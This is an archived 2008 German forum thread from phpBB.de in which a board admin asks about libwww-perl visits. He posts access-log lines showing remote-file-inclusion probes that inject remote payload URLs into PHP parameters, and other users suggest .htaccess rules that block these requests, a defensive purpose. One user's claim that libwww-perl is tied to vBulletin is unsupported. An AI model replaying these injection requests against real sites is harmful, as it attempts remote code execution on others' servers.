libwww-perl = kritischer Zugriff?

uwe.ha · Beitrag von **uwe.ha** » 12.08.2008 23:38

Hallo,

eben ist mir ein Gast aufgefallen:

Gast
IP: 74.52.139.226 » Whois
libwww-perl/5.810

Habe gelesen, dass dieses libwww etwas kritisches sein soll und habe daraufhin wie von larsneo in Beitrag http://www.phpbb.de/viewtopic.php?p=880235#880235 empfohlen folgenden Eintrag in meine root/.htaccess gemacht:

larsneo hat geschrieben:du kannst recht einfach libwww (und das pendant lwp) via .htaccess aussperren
Code: Alles auswählen
# prevent perl user agent
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Ist der libww-Zugriff immer noch kritisch?
Und ist diese o.g. Maßnahme immer noch korrekt und ausreichend?

Danke!

igorw · Beitrag von **igorw** » 13.08.2008 01:55

Ich seh nicht wirklich ein was an "libwww-perl" an sich gefährlich sein sollte. lwp ist eine library für http verbindungen. Damit kann man bots schreiben, aber bots sind nicht automatisch böse.

Ausserdem kann man den user agent ("libwww-perl/5.810") so leicht ändern dass es sich nicht wirklich lohnt da etwas zu machen. Meines erachtens jedenfalls nicht.

uwe.ha · Beitrag von **uwe.ha** » 13.08.2008 10:05

eviL<3 hat geschrieben:Ich seh nicht wirklich ein was an "libwww-perl" an sich gefährlich sein sollte.

"an sich" vielleicht nichts, aber was man damit anstellen kann. Zumindest sehen die Abfragen komisch aus:

Code: Alles auswählen

GET /phpBB/viewtopic.php?f=54&p=83338/index.php?Language=http://xxx.xxx.pl/logo/sistem.txt?? HTTP/1.1	200
GET /index.php?Language=http://xxx.xxx.pl/logo/sistem.txt?? HTTP/1.1	404
GET /phpBB/index.php?Language=http://xxx.xxx.pl/logo/sistem.txt?? HTTP/1.1	200
GET /index.php?inhalt=http://xxx.xxx.com/links/id??%0D?? HTTP/1.1	404
GET /phpBB/viewtopic.php?t=8322/index.php?inhalt=http://xxx.xxx.com/links/id??%0D?? HTTP/1.1	200
GET /phpBB/index.php?inhalt=http://xxx.xxx.com/links/id??%0D?? HTTP/1.1	200
GET /phpBB/viewtopic.php?t=8322/index.php?inhalt=http://xxx.xxx.org/dhwm/alb2.txt? HTTP/1.1	200
GET /index.php?inhalt=http://xxx.xxx.org/dhwm/alb2.txt? HTTP/1.1	404
GET /phpBB/index.php?inhalt=http://xxx.xxx.org/dhwm/alb2.txt? HTTP/1.1	200
GET /head.php?adresa=http://xxx.xxx.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1	404
GET /phpBB/head.php?adresa=http://xxx.xxx.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1	404
GET /phpBB/viewtopic.php?f=24&t=7321/head.php?adresa=http://xxx.xxx.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1	200
GET /phpBB/viewtopic.php?t=7001//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://xxx.xxx.com/bbs//mraneti.txt???? HTTP/1.1	200
GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://xxx.xxx.com/bbs//mraneti.txt???? HTTP/1.1	404
GET /phpBB//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://xxx.xxx.com/bbs//mraneti.txt???? HTTP/1.1	404
GET /phpBB/main.php?page=http://xxx.xxx.de/cache/idd.txt??? HTTP/1.1	404
GET /main.php?page=http://xxx.xxx.de/cache/idd.txt??? HTTP/1.1	404
GET /phpBB/viewtopic.php?t=5589%20/main.php?page=http://xxx.xxx.de/cache/idd.txt??? HTTP/1.1	200
GET /phpBB/viewtopic.php?f=29&t=7488/?_SERVER[DOCUMENT_ROOT]=http://xxx.xxx.com/ips.txt? HTTP/1.1	200
GET /?_SERVER[DOCUMENT_ROOT]=http://xxx.xxx.com/ips.txt? HTTP/1.1	200
GET /phpBB/?_SERVER[DOCUMENT_ROOT]=http://xxx.xxx.com/ips.txt? HTTP/1.1	200
GET /phpBB/viewtopic.php?f=29&t=7488/index.php?page=http://xxx.xxx.com/ips.txt? HTTP/1.1	200
GET /index.php?page=http://xxx.xxx.com/ips.txt? HTTP/1.1	404
GET /phpBB/index.php?page=http://xxx.xxx.com/ips.txt? HTTP/1.1	200
GET /phpBB/viewforum.php?f=84//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	200
GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	404
GET /phpBB//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	404
GET /phpBB/viewforum.php?f=84//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	200
GET /phpBB/viewforum.php?f=84//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	200
GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	404
GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	404
GET /phpBB//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	404
GET /phpBB//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://xxx.xxx.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1	404

Edit: Habe die url's mal etwas ausge-x-t

Was ist das; wird da mit einem Script nach Lücken gesucht?

markus giersch · Beitrag von **markus giersch** » 13.08.2008 10:36

BTW wwwlib-perl ist etwas was mit v-Bulletin zu tuen hat.
wwwlib-perl wurde mal von Hackers.com (die heisen heute auch wieder anders) übernommen wobei Hackers.com von vBulletin geschluckt wurde. Mittlerweile nennt sich das auch powered by vBulletin.
Versteht sich ja von selber das vBulletin höchstes interesse daran hat das phpbb den Bach runter geht.
Und richtig Aussperren ist schwer. Damals bei phpbb3.de hamme es versucht - hat auch geklappt - aber nur für eine Woche, dann kamen die wieder. Aber richtig was kaputt gemacht haben die nie, "nur" alles ausgelesen. (Das ist mein Wissenstand von vor 1 Jahr).

larsneo · Beitrag von **larsneo** » 13.08.2008 10:48

uwe.ha hat geschrieben:Ist der libww-Zugriff immer noch kritisch?

sagen wir es einmal so - in den vergangenen jahren ist mir noch nie ein zugriff über die typischen standard-perl useragents begegnet, den es wirklich gebraucht hätte. es ist für mich nachwievor erstaunlich, wieviel traffic man sich mit einem entsprechenden block sparen kann - auch wenn man (als angreifer) den UA in perl recht einfach selbst definieren könnte, sind wohl scheinbar viele einfach zu faul dazu...

markus giersch hat geschrieben:BTW wwwlib-perl ist etwas was mit v-Bulletin zu tuen hat.

das ist ja mal eine ganze interessante theorie - hast du dafür vielleicht irgendwelche quellen (ich hatte das immer hierfür gehalten) ?

uwe.ha · Beitrag von **uwe.ha** » 13.08.2008 11:30

Hallo larsneo,

larsneo hat geschrieben: es ist für mich nachwievor erstaunlich, wieviel traffic man sich mit einem entsprechenden block sparen kann

Also ist dein Vorschlag für die htaccess immer noch sinnvoll und/oder aktuell, richtig?

Ich habe auch diesen libwww mal als Spider/Robot hinzugefügt und sehe nun, dass "er" eben wieder da war (kann das - trotz des htaccess-Eintrages - sein?). Macht es Sinn diesen libwww unter "Bots verwalten" zu Deaktivieren, bzw. was würde das bewirken?

Und ws ist mit den o.g. Log-Einträgen; sind die kritisch?

larsneo · Beitrag von **larsneo** » 13.08.2008 13:58

Also ist dein Vorschlag für die htaccess immer noch sinnvoll und/oder aktuell, richtig?

wie gesagt - es ist kein garant für sicherheit sondern spart nur traffic (und blockt ein paar scriptkiddies)

Und ws ist mit den o.g. Log-Einträgen; sind die kritisch?

beim schnellen drüberschauen scheinen die logeinträge nur den versuch einer remote code execution anzuzeigen (das erfolgt inzwischen in aller regel 'blind' also ohne direkten bezug zu einer sicherheitslücke.

hier könnte ggfs. folgendes rewriting abhilfe schaffen:

Code: Alles auswählen

RewriteEngine On
RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]

allerdings verwende ich dafür modsecurity-rules bzw. einen entsprechend konfigurierten webserver, hier gilt es also zu testen ob keine funktionalitäten der seite eingeschränkt werden.

uwe.ha · Beitrag von **uwe.ha** » 13.08.2008 14:43

Hallo larsneo,

du hattest mir vor ein paar Wochen schon bei der Konfiguration meines Servers geholfen; ich habe:
- MySQL 5.0.51a-community-log
- Apache/2.2.8
- PHP Version 5.2.6

- suhosin ... ist auch drin
- mod_security ... steht im ACP bei den loaded moduls drinnen
- pecl:apc ... wurde installiert, "da aber bekannte Konkurrenzen zum Zend vorhanden sind wurde Zend deinstalliert" schreibt mein Provider.
(Im ACP ist aber noch das "Zend Engine 2"-Logo mit dem text: "This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.2.0")
- register_globals OFF
- allow_url_fopen OFF
- allow_url_include OFF

Reicht das, oder sollte ich noch was (das zuletzt vorgeschlagene rewriting) machen?

DANKE!

larsneo · Beitrag von **larsneo** » 13.08.2008 14:58

- allow_url_fopen OFF
- allow_url_include OFF

damit erledigt sich das letzte rewrite, eine externe code-einbindung ist auf deinem server nicht möglich

uwe.ha · Beitrag von **uwe.ha** » 13.08.2008 15:31

Dann hat deine Hilfe bei der Serverkonfiguration ja schon Früchte getragen

DANKE!